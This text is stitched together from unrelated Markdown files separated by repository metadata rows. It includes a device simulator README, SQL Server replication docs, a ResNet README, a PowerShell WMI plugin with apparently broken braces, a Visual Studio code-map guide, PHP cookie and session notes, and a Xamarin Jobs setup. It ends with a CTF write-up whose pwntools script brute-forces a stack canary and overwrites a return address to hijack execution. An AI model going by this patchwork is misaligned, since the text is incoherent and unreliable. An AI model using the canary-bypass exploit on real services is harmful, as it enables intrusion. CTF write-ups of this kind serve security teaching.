- [2.2. gNOI Client User Manual](#22-gNOI-Client-User-Manual)
# 1. Device Simulator
This is a docker VM that runs a gNMI and/or gNOI implementation
supporting openconfig models.
Inspired by https://github.com/faucetsdn/gnmi
All commands below assume you are in the __devicesim__ directory
## 1.1. Simulator mode
The device simulator can operate in three modes, controlled
using **SIM_MODE** environment variable in the docker-compose file.
1) SIM_MODE=1 as gNMI target only. The configuration is loaded by default from [configs/target_configs/typical_ofsw_config.json](../configs/target_configs/typical_ofsw_config.json)
2) SIM_MODE=2 as gNOI target only. It supports *Certificate management* that can be used for certificate installation and rotation.
3) SIM_MODE=3 both gNMI and gNOsI targets simultaneously
## 1.2. Run mode - localhost or network
Additionally the simulator can be run in
* localhost mode - use on Docker for Mac, Windows or Linux
* dedicated network mode - for use on Linux only
> Docker for Mac or Windows does not support accessing docker images
> externally in dedicated network mode. Docker on Linux can run either.
## 1.3. docker-compose
Docker compose manages the running of several docker images at once.
For example to run 3 **SIM_MODE=1** (gNMI only devices) and **localhost** mode, use:
```bash
cd tools/docker_compose
docker-compose -f docker-compose-gnmi.yml up
```
This gives an output like
```bash
Creating devicesim_devicesim3_1 ...
Creating devicesim_devicesim1_1 ...
Creating devicesim_devicesim2_1 ...
Creating devicesim_devicesim3_1
Creating devicesim_devicesim2_1
Creating devicesim_devicesim1_1 ... done
Attaching to devicesim_devicesim3_1, devicesim_devicesim2_1, devicesim_devicesim1_1
devicesim3_1 | gNMI running on localhost:10163
devicesim2_1 | gNMI running on localhost:10162
devicesim1_1 | gNMI running on localhost:10161
```
> Use the -d mode with docker-compose to make it run as a daemon in the background
### 1.3.1. Running on Linux
If you are fortunate enough to be using Docker on Linux, then you can use the
above method __or__ using the command below to start in **SIM_MODE=1** and **network** mode:
```bash
cd tools/docker_compose
docker-compose -f docker-compose-linux.yml up
```
This will use the fixed IP addresses 172.25.0.11, 172.25.0.12, 172.25.0.13 for
device1-3. An entry must still be placed in your /etc/hosts file for all 3 like:
```bash
172.25.0.11 device1.opennetworking.org
172.25.0.12 device2.opennetworking.org
172.25.0.13 device3.opennetworking.org
```
> This uses a custom network 'simnet' in Docker and is only possible on Docker for Linux.
> If you are on Mac or Windows it is __not possible__ to route to User Defined networks,
> so the port mapping technique must be used.
> It is not possible to use the name mapping of the docker network from outside
> the cluster, so either the entries have to be placed in /etc/hosts or on some
> DNS server
## 1.4. Run a single docker container
If you just want to run a single device, it is not necessary to run
docker-compose. It can be done just by docker directly, and can be
handy for troubleshooting. The following command shows how to run
a standalone simulator in SIM_MODE=3, localhost mode:
```bash
docker run --env "HOSTNAME=localhost" --env "SIM_MODE=3" \
--env "GNMI_PORT=10164" --env "GNOI_PORT=50004" \
-p "10164:10164" -p "50004:50004" onosproject/device-simulator:latest
```
To stop it use "docker kill"
## 1.5. Create the docker image
By default the docker compose command will pull down the latest docker
image from the Docker Hub. If you need to build it locally, run:
```bash
docker build -t onosproject/device-simulator:stable -f Dockerfile .
```
# 2. Client tools for testing
You can access to the information about client tools for each SIM_MODE
including troubleshooting tips using the following links:
## 2.1. gNMI Client User Manual
[gNMI Client_User Manual](gnmi/gnmi_user_manual.md)
## 2.2. gNOI Client User Manual
[gNOI Client_User Manual](gnoi/gnoi_user_manual.md)
| 39.836207 | 180 | 0.760225 | eng_Latn | 0.953126 |
e03bc5414104c588ee4204f58b025bbe776d9bd1 | 4,081 | md | Markdown | docs/relational-databases/replication/snapshot-agent-security.md | rsanderson2350/sql-docs | 3206a31870f8febab7d1718fa59fe0590d4d45db | [
"CC-BY-4.0",
"MIT"
] | 1 | 2019-07-05T14:10:29.000Z | 2019-07-05T14:10:29.000Z | docs/relational-databases/replication/snapshot-agent-security.md | rsanderson2350/sql-docs | 3206a31870f8febab7d1718fa59fe0590d4d45db | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/relational-databases/replication/snapshot-agent-security.md | rsanderson2350/sql-docs | 3206a31870f8febab7d1718fa59fe0590d4d45db | [
"CC-BY-4.0",
"MIT"
] | 1 | 2019-09-16T00:08:14.000Z | 2019-09-16T00:08:14.000Z | ---
title: "Snapshot Agent Security | Microsoft Docs"
ms.custom: ""
ms.date: "03/14/2017"
ms.prod: "sql-non-specified"
ms.prod_service: "database-engine, sql-database"
ms.service: ""
ms.component: "replication"
ms.reviewer: ""
ms.suite: "sql"
ms.technology:
- "replication"
ms.tgt_pltfrm: ""
ms.topic: "article"
f1_keywords:
- "sql13.rep.security.SSA.f1"
helpviewer_keywords:
- "Snapshot Agent Security dialog box"
ms.assetid: 64e84c67-acc6-4906-98d4-3451767363fe
caps.latest.revision: 21
author: "MikeRayMSFT"
ms.author: "mikeray"
manager: "craigg"
ms.workload: "Inactive"
---
# Snapshot Agent Security
[!INCLUDE[appliesto-ss-asdb-xxxx-xxx-md](../../includes/appliesto-ss-asdb-xxxx-xxx-md.md)]
The **Snapshot Agent Security** dialog box allows you to specify:
- The [!INCLUDE[msCoName](../../includes/msconame-md.md)] Windows account under which the Snapshot Agent runs at the Distributor. The Windows account is also referred to as the *process account*, because the agent process runs under this account.
- The context under which the Snapshot Agent makes connections to the [!INCLUDE[msCoName](../../includes/msconame-md.md)] [!INCLUDE[ssNoVersion](../../includes/ssnoversion-md.md)] Publisher. The connection can be made by impersonating the Windows account or under the context of a [!INCLUDE[ssNoVersion](../../includes/ssnoversion-md.md)] account you specify.
> [!NOTE]
> The Snapshot Agent makes connections to the Publisher even if the Publisher and Distributor are on the same computer. The Snapshot Agent also makes connections to the Distributor; these connections are always made by impersonating the Windows account under which the agent runs.
For Oracle Publishers, specify the context under which the Snapshot Agent connects to the Publisher in the **Publisher Properties** dialog box (available from the **Distributor Properties** dialog box). For more information, see [View and Modify Replication Security Settings](../../relational-databases/replication/security/view-and-modify-replication-security-settings.md).
All accounts must be valid, with the correct password specified for each account. Accounts and passwords are not validated until an agent runs.
## Options
**Process account**
Enter a Windows account under which the Snapshot Agent runs at the Distributor. The Windows account you specify must:
- At minimum be a member of the **db_owner** fixed database role in the distribution database.
- Have write permissions on the snapshot share.
**Password** and **Confirm password**
Enter the password for the Windows account.
**Connect to the Publisher**
Select whether the Snapshot Agent should make connections to the Publisher by impersonating the account specified in the **Process account** text box or by using a [!INCLUDE[ssNoVersion](../../includes/ssnoversion-md.md)] account. If you select to use a [!INCLUDE[ssNoVersion](../../includes/ssnoversion-md.md)] account, enter a [!INCLUDE[ssNoVersion](../../includes/ssnoversion-md.md)] login and password.
> [!NOTE]
> It is recommended that you select to impersonate the Windows account rather than using a [!INCLUDE[ssNoVersion](../../includes/ssnoversion-md.md)] account.
The Windows account or [!INCLUDE[ssNoVersion](../../includes/ssnoversion-md.md)] account used for the connection must at minimum be a member of the **db_owner** fixed database role in the publication database.
## See Also
[Manage Logins and Passwords in Replication](../../relational-databases/replication/security/manage-logins-and-passwords-in-replication.md)
[Replication Agent Security Model](../../relational-databases/replication/security/replication-agent-security-model.md)
[Replication Agents Overview](../../relational-databases/replication/agents/replication-agents-overview.md)
[Replication Security Best Practices](../../relational-databases/replication/security/replication-security-best-practices.md)
| 60.910448 | 410 | 0.737564 | eng_Latn | 0.95866 |
e03bccabc1f0e452e6b5131c9d0329288bc73510 | 353 | md | Markdown | Convolutional Neural Networks/week2/1 Residual_Networks/README.md | Saurabh2323/2021Deep-Learning-Specialization-Coursera | df0995092af39f917304c8f4b459e91ae8f635d0 | [
"Apache-2.0"
] | 15 | 2021-11-03T04:33:22.000Z | 2022-03-30T18:24:57.000Z | Convolutional Neural Networks/week2/1 Residual_Networks/README.md | Saurabh2323/2021Deep-Learning-Specialization-Coursera | df0995092af39f917304c8f4b459e91ae8f635d0 | [
"Apache-2.0"
] | null | null | null | Convolutional Neural Networks/week2/1 Residual_Networks/README.md | Saurabh2323/2021Deep-Learning-Specialization-Coursera | df0995092af39f917304c8f4b459e91ae8f635d0 | [
"Apache-2.0"
] | 21 | 2021-11-03T04:34:11.000Z | 2022-03-22T10:17:06.000Z | **ResNet**
*ResNet* means *Residual Networks*
In this part, you will learn to implement a skip connection in your network
Basically you will implement the basic building blocks of ResNets in a deep neural network using Keras and then put together these building blocks to implement and train a state-of-the-art neural network for image classification
| 50.428571 | 228 | 0.807365 | eng_Latn | 0.998508 |
e03be70d2863a7d0b1fd3b3ccc30e3562e2d4b90 | 2,286 | md | Markdown | docs/Instances.ps1.md | MSAdministrator/PoshCodeMarkDown | 062c6065193eaeb46efc185ee9a25b4957ed98b5 | [
"MIT"
] | 7 | 2019-02-22T05:58:27.000Z | 2021-09-02T09:43:52.000Z | docs/Instances.ps1.md | MSAdministrator/PoshCodeMarkDown | 062c6065193eaeb46efc185ee9a25b4957ed98b5 | [
"MIT"
] | 1 | 2021-05-19T09:30:21.000Z | 2021-05-19T09:30:21.000Z | docs/Instances.ps1.md | MSAdministrator/PoshCodeMarkDown | 062c6065193eaeb46efc185ee9a25b4957ed98b5 | [
"MIT"
] | 2 | 2018-08-29T13:55:38.000Z | 2021-01-07T18:29:18.000Z | ---
Author: janny
Publisher:
Copyright:
Email:
Version: 1.01
Encoding: ascii
License: cc0
PoshCode ID: 4877
Published Date: 2014-02-04t14
Archived Date: 2014-02-07t23
---
# instances -
## Description
from greg�s repository on github. plugin for wmiexplorer (copy this file into “plugins” folder in $psscriptroot directory)
## Comments
## Usage
## TODO
##
``
## Code
`#
#
<?xml version="1.0"?>
<WmiExplorerPlugin>
<PluginAuthor>greg zakharov</PluginAuthor>
<PluginVersion>1.01</PluginVersion>
<InjectObject>$mnuInst</InjectObject>
<ObjectText>&Show Instances</ObjectText>
<Code>
if (Get-UserStatus) {
$frmInst = New-Object Windows.Forms.Form
$rtbInst = New-Object Windows.Forms.RichTextBox
#
#
$rtbInst.Dock = [Windows.Forms.DockStyle]::Fill
$rtbInst.ReadOnly = $true
#
#
$frmInst.ClientSize = New-Object Drawing.Size(530, 270)
$frmInst.Controls.Add($rtbInst)
$frmInst.Icon = $ico
$frmInst.StartPosition = [Windows.Forms.FormStartPosition]::CenterParent
$frmInst.Text = "Instances"
$frmInst.Add_Load({
try {
$ins = $wmi.GetInstances()
if ($ins.Count -ne 0) {
foreach ($i in $ins) {
$i.PSBase.Properties | % {
$rtbInst.SelectionFont = $bol2
$rtbInst.AppendText($_.Name + ': ')
$rtbInst.SelectionFont = $norm
if ($_.Value -eq $null) {
$rtbInst.AppendText("`n")
}
elseif ($_.IsArray) {
$ofs = ";"
$rtbInst.AppendText("$($_.Value)")
$ofs = $null
$rtbInst.AppendText("`n")
}
else {
$rtbInst.AppendText("$($_.Value)`n")
}
}
$rtbInst.AppendText("`n$('=' * 57)`n")
}
else {
$rtbInst.SelectionFont = $bol1
$rtbInst.AppendText("Out of context.")
}
}
catch [Management.Automation.RuntimeException] {}
[void]$frmInst.ShowDialog()
}
</Code>
</WmiExplorerPlugin>
`
| 22.86 | 122 | 0.512686 | yue_Hant | 0.769854 |
e03c3960cf5790e2a5a5a9ed6edbb2e386db2d42 | 8,443 | md | Markdown | docs/debugger/map-methods-on-the-call-stack-while-debugging-in-visual-studio.md | SunnyDeng/visualstudio-docs | 9989865054058dbd6c3a715958bd59a102fe9fba | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/debugger/map-methods-on-the-call-stack-while-debugging-in-visual-studio.md | SunnyDeng/visualstudio-docs | 9989865054058dbd6c3a715958bd59a102fe9fba | [
"CC-BY-4.0",
"MIT"
] | 3 | 2019-04-17T23:46:44.000Z | 2019-04-18T00:09:37.000Z | docs/debugger/map-methods-on-the-call-stack-while-debugging-in-visual-studio.md | SunnyDeng/visualstudio-docs | 9989865054058dbd6c3a715958bd59a102fe9fba | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: "Create a visual map of the call stack | Microsoft Docs"
ms.date: "11/26/2018"
ms.topic: "conceptual"
f1_keywords:
- "vs.progression.debugwithcodemaps"
dev_langs:
- "CSharp"
- "VB"
- "FSharp"
- "C++"
helpviewer_keywords:
- "call stacks, code maps"
- "Call Stack window, mapping calls"
- "debugging [Visual Studio], diagramming the call stack"
- "call stacks, mapping"
- "Call Stack window, visualizing"
- "debugging code visually"
- "debugging [Visual Studio], mapping the call stack"
- "call stacks, visualizing"
- "debugging, code maps"
- "Call Stack window, tracing calls visually"
- "Call Stack window, show on code map"
- "debugging [Visual Studio], tracing the call stack visually"
- "debugging [Visual Studio], visualizing the call stack"
ms.assetid: d6a72e5e-f88d-46fc-94a3-1789d34805ef
author: "mikejo5000"
ms.author: "mikejo"
manager: jillfra
ms.workload:
- "multiple"
---
# Create a visual map of the call stack while debugging (C#, Visual Basic, C++, JavaScript)
Create a code map to visually trace the call stack while you're debugging. You can make notes on the map to track what the code is doing, so you can focus on finding bugs.
For a walkthrough, watch this video:
[Video: Debug visually with Code Map debugger integration (Channel 9)](http://go.microsoft.com/fwlink/?LinkId=293418)
For details of commands and actions you can use with code maps, see [Browse and rearrange code maps](../modeling/browse-and-rearrange-code-maps.md).
>[!IMPORTANT]
>You can create code maps only in [Visual Studio Enterprise edition](https://visualstudio.microsoft.com/downloads/?utm_medium=microsoft&utm_source=docs.microsoft.com&utm_campaign=inline+link&utm_content=download+vs2019).
Here's a quick look at a code map:

## <a name="MapStack"></a> Map the call stack
1. In a Visual Studio Enterprise C#, Visual Basic, C++, or JavaScript project, start debugging by selecting **Debug** > **Start Debugging** or pressing **F5**.
1. After your app enters break mode or you step into a function, select **Debug** > **Code Map**, or press **Ctrl**+**Shift**+**`**.
The current call stack appears in orange on a new code map:

The code map updates automatically as you continue debugging. Changing map items or layout doesn't affect the code in any way. Feel free to rename, move, or remove anything on the map.
To get more information about an item, hover over it and look at the item's tooltip. You can also select **Legend** in the toolbar to learn what each icon means.

>[!NOTE]
>The message **The diagram may be based on an older version of the code** at the top of the code map means that the code might have changed after you last updated the map. For example, a call on the map might not exist in code anymore. Close the message, then try rebuilding the solution before updating the map again.
## Map external code
By default, only your own code appears on the map. To see external code on the map:
- Right-click in the **Call Stack** window and select **Show External Code**:

- Or, deselect **Enable Just My Code** in Visual Studio **Tools** (or **Debug**) > **Options** > **Debugging**:

## Control the map's layout
Changing the map's layout doesn't affect the code in any way.
To control the map's layout, select the **Layout** menu on the map toolbar.
In the **Layout** menu, you can:
- Change the default layout.
- Stop rearranging the map automatically, by deselecting **Automatically Layout when Debugging**.
- Rearrange the map as little as possible when you add items, by deselecting **Incremental Layout**.
## <a name="MakeNotes"></a> Make notes about the code
You can add comments to track what's happening in the code.
To add a comment, right-click in the code map and select **Edit** > **New Comment**, then type the comment.
To add a new line in a comment, press **Shift**+**Enter**.

## <a name="UpdateMap"></a> Update the map with the next call stack
As you run your app to the next breakpoint or step into a function, the map adds new call stacks automatically.

To stop the map from adding new call stacks automatically, select  on the code map toolbar. The map continues to highlight existing call stacks. To manually add the current call stack to the map, press **Ctrl**+**Shift**+**`**.
## <a name="AddRelatedCode"></a> Add related code to the map
Now that you've got a map, in C# or Visual Basic, you can add items like fields, properties, and other methods, to track what's happening in the code.
To go to the definition of a method in the code, double-click the method in the map, or select it and press **F12**, or right-click it and select **Go To Definition**.

To add items that you want to track to the map, right-click a method and select the items you want to track. The most recently added items appear in green.

>[!NOTE]
>By default, adding items to the map also adds the parent group nodes such as the class, namespace, and assembly. You can turn this feature off and on by selecting the **Include Parents** button on the code map toolbar, or by pressing **Ctrl** while you add items.

Continue building the map to see more code.


## <a name="FindBugs"></a> Find bugs using the map
Visualizing your code can help you find bugs faster. For example, suppose you're investigating a bug in a drawing app. When you draw a line and try to undo it, nothing happens until you draw another line.
So you set breakpoints in the `clear`, `undo`, and `Repaint` methods, start debugging, and build a map like this one:

You notice that all the user gestures on the map call `Repaint`, except for `undo`. This might explain why `undo` doesn't work immediately.
After you fix the bug and continue running the app, the map adds the new call from `undo` to `Repaint`:

## Share the map with others
You can export a map, send it to others with Microsoft Outlook, save it to your solution, and check it into version control.
To share or save the map, use **Share** in the code map toolbar.

## See also
[Map dependencies across your solutions](../modeling/map-dependencies-across-your-solutions.md)
[Use code maps to debug your applications](../modeling/use-code-maps-to-debug-your-applications.md)
[Find potential problems using code map analyzers](../modeling/find-potential-problems-using-code-map-analyzers.md)
[Browse and rearrange code maps](../modeling/browse-and-rearrange-code-maps.md)
| 52.440994 | 370 | 0.754471 | eng_Latn | 0.953594 |
e03ccc14f03c318d25b1c2fa77c5c4fb17e28aef | 6,855 | md | Markdown | 2.0-cookie.md | Alpha-CL/PHP-Note | ea739daa41d738d566ca2fbddfc8abaa80bb937f | [
"Apache-2.0"
] | 1 | 2019-12-16T10:55:32.000Z | 2019-12-16T10:55:32.000Z | 2.0-cookie.md | Alpha-CL/PHP-Note | ea739daa41d738d566ca2fbddfc8abaa80bb937f | [
"Apache-2.0"
] | null | null | null | 2.0-cookie.md | Alpha-CL/PHP-Note | ea739daa41d738d566ca2fbddfc8abaa80bb937f | [
"Apache-2.0"
] | null | null | null | # HTTP 会话
#### Cookie
> HTTP 很重要的一个特点 `无状态`( 每次见面都是 `初次见面`)
> 如果希望服务端程序去记住每个访问的访客是不可能的
> 必须借助一些手段或者技巧让服务端记住客户端,这种手段就是`Cookie`
``` vim
+ -------- + + -------- +
| | | |
| | | |
| | ----------------------------------------> | |
| | | |
| | GET http://www.example.com/ HTTP/1.1 | |
| | | |
| | | |
| | <---------------------------------------- | |
| | | |
| Client | HTTP/1.1 200 OK | Server |
| | set-cookie: session-id=12345; | |
| | | |
| | | |
| | ----------------------------------------> | |
| | | |
| | GET http://www.example.com/ HTTP/1.1 | |
| | cookie: session-id=12345; | |
| | | |
| | | |
+ -------- + + -------- +
```
#### 设置 Cookie
__php cookie__
``` php
//! set Response Headers 'Set-Cookie' => request server
header('Set-Cookie: foo = bar');
//! php set cookie method
//para1: 设置为一个过去时间
setcookie('key');
//para2: 设置 cookie 的 name value
setcookie('key1', 'value1');
//para3: 过期时间,过期后 cookie 不生效
setcookie('key2', 'value', time() + 1 * 24 + 60 * 60);
//para4: 设置 cookie domain ( 作用域名范围 )
setcookie('key4', 'value4', time() + 1 * 24 + 60 * 60, '/');
//TODO: para5, para6 ...
setcookie('key4', 'value4', time() + 1 * 24 + 60 * 60, '/', '', false, true);
//! receive cookie
var_dump($_COOKIE);
```
> JS cookie 无法访问到 。。。。。?
__JS cookie__
``` javascript
//set only cookie
document.cookie = 'js = fuck';
//receive all cookie
document.cookie;
```
#### Session
本地造假 cookie
``` javascript
var dt = new Date();
dt.setYear(2018);
document.cookie = 'app-installed=1; expires=' + dt.toGMTSring();
```
> Cookie 是服务器给客户由 `客户端本地保存`,客户可以在本地随意操作( 删除/修改 )
> 也可以伪造假 Cookie,对于服务端是无法辨别的,会造成 服务端被蒙蔽,构成`安全隐患`
> Session 是 Cookie 升级版
``` vim
+ ------------------------------------------------------------------------------------- +
| |
| |
| Server |
| |
| + ------------------------------------------------ + |
| | | |
+ ---------- + | | Session | |
| | | | |
| | Cookie session_id=0x001 + ---------------- + ------------- + ------------- + |
| client1 |---------------------------------> | 0x001 | 0x002 | 0x003 | |
| | | + ---------------- + ------------- + ------------- + |
| | | | key1: hello | key1: some | key1:may | |
+ ---------- + | + ---------------- + ------------- + ------------- + |
+ ---------- + | | key2: world | key2: time | | |
| | + ---------------- + ------------- + ------------- + |
| | Cookie session_id=0x002 | | key3: ok | | |
| client2 |---------------------------------> + ---------------- + ------------- + ------------- + |
| | | | | |
| | | + ---------------- + ------------- + ------------- + |
+ ---------- + | | 0x004 | 0x005 | 0x006 | |
+ ---------- + | + ---------------- + ------------- + ------------- + |
| | | who | | | |
| | Cookie session_id=0x003 + ---------------- + ------------- + ------------- + |
| client3 |---------------------------------> | | | | |
| | | + ---------------- + ------------- + ------------- + |
| | | | | | | |
+ ---------- + | + ---------------- + ------------- + ------------- + |
| | | | | |
| +------------------------------------------------- + |
| |
| |
| |
+ ------------------------------------------------------------------------------------- +
```
__Session 与 Cookie 区别__
> Cookie 数据存放在`本地客户端`,Session 数据存放在`服务器`
> 用户无法修改客户端数据,所以相对安全
``` php
//帮助用户找箱子( 有则进入,无则创建 )
session_start();
//设置 session
$_SESSION['key'] = 'value';
```
| 27.641129 | 144 | 0.169657 | yue_Hant | 0.324856 |
e03d1d248c20bbb6e3010f104cd50a43d00d879e | 72 | md | Markdown | README.md | nuttka/banco-de-dados | 9bfbd6e9f8aa2f739c64dfd51be936f70bdd89bb | [
"MIT"
] | null | null | null | README.md | nuttka/banco-de-dados | 9bfbd6e9f8aa2f739c64dfd51be936f70bdd89bb | [
"MIT"
] | null | null | null | README.md | nuttka/banco-de-dados | 9bfbd6e9f8aa2f739c64dfd51be936f70bdd89bb | [
"MIT"
] | null | null | null | # banco-de-dados
Repositório para a matéria Introdução à Banco de Dados
| 24 | 54 | 0.805556 | por_Latn | 1.000001 |
e03d9b90ac7e4a330ed8e9fd432cf1c60d50784f | 1,416 | md | Markdown | platform_android.md | aritchie/jobs | e8a51928c300132af52970195c7203f7ddda4b28 | [
"MIT"
] | 97 | 2018-09-14T08:37:38.000Z | 2020-06-25T13:49:09.000Z | platform_android.md | aritchie/jobs | e8a51928c300132af52970195c7203f7ddda4b28 | [
"MIT"
] | 9 | 2018-10-01T14:57:04.000Z | 2020-02-04T12:36:59.000Z | platform_android.md | aritchie/jobs | e8a51928c300132af52970195c7203f7ddda4b28 | [
"MIT"
] | 15 | 2018-09-25T21:46:43.000Z | 2021-07-12T00:03:53.000Z | ## Setup - Android
1.Install From [](https://www.nuget.org/packages/Plugin.Jobs/)
2. In Android, you must create an Application class similar to below
```csharp
sing System;
using Android.App;
using Android.Runtime;
using Plugin.Jobs;
namespace Sample.Droid
{
[Application]
public class MainApplication : Application
{
static IContainer container;
public MainApplication(IntPtr handle, JniHandleOwnership transfer) : base(handle, transfer)
{
}
public override void OnCreate()
{
CrossJobs.Init(this);
base.OnCreate();
}
}
}
```
3.Add the following to your AndroidManifest.xml
```xml
<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />
<uses-permission android:name="android.permission.BATTERY_STATS" />
<uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />
```
__OPTIONAL__
On Android, you'll have to set the CrossJob.ResolveJob = (jobInfo) => return IJob in the MainApplication
### NOTES
* If Doze is enabled, the reschedule period is not guaranteed to be an average of 10 mins. It may be much longer.
* IF YOU ARE NOT SCHEDULING YOUR JOBS ON EVERY START - If you application force quits, Android will not restart the job scheduler. For this, there is CrossJobs.EnsureJobServiceStarted | 28.32 | 184 | 0.716808 | eng_Latn | 0.518105 |
e03ddd47c5a786af2e58c356bcde06303471c419 | 28,934 | md | Markdown | b01lersctf2020/blind-piloting/README.md | nhtri2003gmail/ctf-write-ups | 7e969c47027c39b614e10739ae3a953eed17dfa3 | [
"MIT"
] | 101 | 2020-03-09T17:40:47.000Z | 2022-03-31T23:26:55.000Z | b01lersctf2020/blind-piloting/README.md | nhtri2003gmail/ctf-write-ups | 7e969c47027c39b614e10739ae3a953eed17dfa3 | [
"MIT"
] | 1 | 2021-11-09T13:39:40.000Z | 2021-11-10T19:15:04.000Z | b01lersctf2020/blind-piloting/README.md | datajerk/ctf-write-ups | 1bc4ecc63a59de7d924c7214b1ce467801792da0 | [
"MIT"
] | 31 | 2020-05-27T12:29:50.000Z | 2022-03-31T23:23:32.000Z | # b01lers CTF 2020
## Blind Piloting
> **Blind Piloting 1**
>
> Dave now has permanent eye damage because he was in the game too long. He's trying to get home, but he can't see. Guide him.
>
> **Blind Piloting 2**
>
> Dave is almost home! He still can't see, but at least he's headed in the right direction.
>
> `nc pwn.ctf.b01lers.com 1007`
>
> [3504de16acb8b2e521528882eab3bc53](blind-piloting.tgz)
>
> Author: nsnc
Tags: _pwn_ _stack-canary_ _bof_ _libc_ _got_ _remote-shell_
### Introduction
This writeup is more of a walkthrough. If too verbose, then click [exploit.py](exploit.py)
### Full Disclosure
I solved this _after_ the CTF had ended, about 3 days later.
I have to give huge shoutout to **@novafacing** (b01lers CTF 2020 Game Master) for keeping this challenge up and twice restarting it for me late at night (within seconds of asking). Otherwise, I would have just chalked this up as another miss and waited for the next CTF.
### Analysis
#### Checksec
```
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
```
All mitigations in place.
#### Decompile with Ghidra
`blindpiloting` has three functions of interest: `main`, `getInput`, and `win`:



`main` just forks and then calls `getInput` (this is important).
`getInput` reads one char character at a time into `acStack24` until either a `\n` is read or 64 characters has been read into a buffer allocated for 8 characters. Clearly this is a vulnerability, however a stack canary prevents overflowing into `local_10`, e.g. 9 A's:
```
# ./blindpiloting
> AAAAAAAAA
*** stack smashing detected ***: <unknown> terminated
```
### Exploit Part 1
#### Attack Plan
1. Brute-force the stack canary.
2. Smash stack and change return pointer to call `win` to obtain `flag1.txt`
#### Bruce-force the stack canary
> This is a great article on the principals of bruce-forcing stack canaries: [https://ctf101.org/binary-exploitation/stack-canaries/](https://ctf101.org/binary-exploitation/stack-canaries/):
>
> _This method can be used on fork-and-accept servers where connections are spun off to child processes, but only under certain conditions such as when the input accepted by the program does not append a NULL byte (read or recv)._
The above text from the aforementioned URL correctly describes this challenge. The _fork-and-accept_ is required so that the canary does not change, this is due to the fork cloning the parent memory, including the stack canary.
Code:
```
#!/usr/bin/env -S python3 -i
from pwn import *
import binascii
import sys
p = process('./blindpiloting')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
#p = remote('pwn.ctf.b01lers.com',1007)
#libc = ELF('libc.so.6')
p.recvuntil('> ')
buf = 8 * b'A'
canary = p8(0)
x = [i for i in range(256) if i != 10 ]
for i in range(7):
for j in x:
payload = buf + canary + p8(j)
p.sendline(payload)
r = p.recvuntil('terminated',timeout=1)
if not r:
canary += p8(j)
print(binascii.hexlify(canary))
break
p.clean()
if r:
print("FAILED, you prob got a LF (0xa) in canary")
sys.exit(1)
print("HAVE CANARY")
```
The x86_64 LSB canary byte is always 0, so only 7 bytes to bruce-force.
The `x = [i for i in range(256) if i != 10 ]` expression creates an array of all byte values to test (`0x00` - `0xFF`) without `0xA` (`\n`). This is important since `getInput` will terminate with a `\n`. _But what if 0xA is part of the canary?_ Well, you're screwed, start over.
The rest of this snippet just loops though each position checking for `terminated` (frequent and quick, see output above), if not, then `j` must be a valid canary byte.
Example output:
```
root@53ade7d2b4a0:/pwd/datajerk/b01lersctf/blind-piloting# ./exploit.py
[x] Starting local process './blindpiloting'
[+] Starting local process './blindpiloting': pid 35650
[*] '/lib/x86_64-linux-gnu/libc.so.6'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
b'000e'
b'000e76'
b'000e7605'
b'000e7605f7'
b'000e7605f702'
b'000e7605f7027a'
b'000e7605f7027aed'
HAVE CANARY
```
At this point any 8 characters + `b'000e7605f7027aed'` will pass the canary check and allow the stack to be smashed.
#### Smash stack and change return pointer to call `win`
Typically at this point we'd overwrite the saved base pointer and then the return address, however because of ASLR (_PIE enabled_--see above) we do not know what address to write. However, we do not need to overwrite the entire address, just the lower bits.
To illustrate this add the following code and the end of the code above and rerun:
```
import code
code.interact(
local=locals(),
banner="\nfrom another terminal type: gef blindpiloting " + str(p.pid) + "\n",
exitmsg="\ngoing back to code\n"
)
```
This code will startup the Python REPL preserving our current state:

After brute-forcing the canary, we're prompted to type `gef blindpiloting 35650`.
> `gef`, like `peda` and `pwndbg` are GDB enhancements that make exploit development a bit easier. In this example I just happen to be using `gef`.
The next argument is the binary, and the last the PID.
> In the left-hand pane I typed the aforementioned, and then typed `context` followed by `disas win`, then `vmmap`.
The first line from `vmmap` reports the base address of the binary. In this case `0x000056401f907000`.
You can also correlate this with the saved base pointer (see stack):
```
0x00007ffdad48ead0│+0x0018: 0x000056401f907ab0 → <__libc_csu_init+0> push r15 ← $rbp
```
and the first line of `win`:
```
0x000056401f9079ec <+0>: push rbp
```
All three start with `0x000056401f907`.
Basically, we just need to overwrite `0x9ec` into the return address lower 12 bits to execute `win`, however we cannot send 1/2 bytes (nibbles), so we'll need to send `0x79ec` (the `7` is the last nibble of `0x000056401f907`). Because x86_64 is little endian bytes are written from right-to-left, _from this point of view_, IOW send `0xec` then `0x79`.
In the left pane the program is currently stopped, but before we _continue_ we need to `set follow-fork-mode child` so that when `main` forks we follow the child process. After that type `c` to start up the binary.
On the right pane type: `p.sendline()`:

Ok, now we're talking.
Send exploit from right pane:
```
p.sendline(buf + canary + 8*b'B' + p16(0x79ec))
```
This is the same as what the brute-force loop determined as the canary + 8 bytes to overwrite the saved base pointer and then the last 16-bits of the return address with the last 16-bit of the `win` address.

SIGSEGV. No flag.
The exploit worked and it _did_ call `win` as shown by the backtrace:
```
[#0] 0x7fae7bb4b13d → do_system(line=0x56401f907b37 "cat flag1.txt")
[#1] 0x56401f9079fc → win()
[#2] 0x7ffdad48ebb0 → add DWORD PTR [rax], eax
```
But why the SIGSEGV from `libc`?:
```
0x7fae7bb4b12d <do_system+349> mov QWORD PTR [rsp+0x68], 0x0
0x7fae7bb4b136 <do_system+358> mov r9, QWORD PTR [rax]
0x7fae7bb4b139 <do_system+361> punpcklqdq xmm0, xmm1
→ 0x7fae7bb4b13d <do_system+365> movaps XMMWORD PTR [rsp+0x50], xmm0
0x7fae7bb4b142 <do_system+370> call 0x7fae7bc05a00 <__GI___posix_spawn>
0x7fae7bb4b147 <do_system+375> mov rdi, r12
0x7fae7bb4b14a <do_system+378> mov DWORD PTR [rsp+0x8], eax
0x7fae7bb4b14e <do_system+382> call 0x7fae7bc05900 <__posix_spawnattr_destroy>
0x7fae7bb4b153 <do_system+387> mov eax, DWORD PTR [rsp+0x8]
```
